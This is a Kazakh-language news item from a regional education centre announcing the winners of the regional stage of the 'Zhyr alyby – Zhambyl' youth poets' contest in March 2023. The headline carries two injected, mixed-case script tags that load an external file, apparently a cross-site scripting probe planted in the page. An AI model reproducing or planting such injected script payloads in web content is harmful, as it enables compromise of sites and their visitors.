«Жыр алыбы-Жамбыл» республикалық жас ақындар конкурсының облыстық кезеңі бойынша қорытынды ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.03.2023

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау орталығының ұйымдастыруымен   2023 жылғы 17 наурыз күні онлайн түрде  «Жыр алыбы-Жамбыл» республикалық жас ақындар конкурсының облыстық кезеңі өткізілді.  

Айтысқа Бурабай, Ерейментау, Целиноград аудандары және Щучье қаласы, IT "Білім-инновация" лицей-интернатының 8-11 сынып  оқушылары қатысты.

Жас ақындар айтысының қорытындысы бойынша I, II, III орын алған оқушылар:  

  1. Сейтімхан Кәусар - Ақмола облысы білім басқармасының Бурабай ауданы бойынша білім бөлімі Щучинск қаласының № 9 мектеп-гимназиясының 9-сынып оқушысы – I орын;
  2. Сэрэкболатұлы Сәттібек - Ақмола облысы білім басқармасының Ерейментау ауданы бойынша білім бөлімі Еркіншілік ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы – I орын;
  3. Қайрат Таңбол - Бурабай ауданы, Щучинск қаласы, «Білім- инновация» ІТ лицей-интернатының 10-сынып оқушысы – II орын;
  4. Сьезд Ерсұлтан - Ақмола облысы білім басқармасының Целиноград ауданы бойынша білім бөлімі Қоянды ауылының № 1 жалпы орта білім беретін мектебінің 8-сынып оқушысы – III орын.

Ақындар айтысының республикалық кезеңіне жолдама алған қатысушыларға сәттілік тілейміз!!!

Просмотров: 272


Пікір қосу



Деректерді қолтаңбаға қосу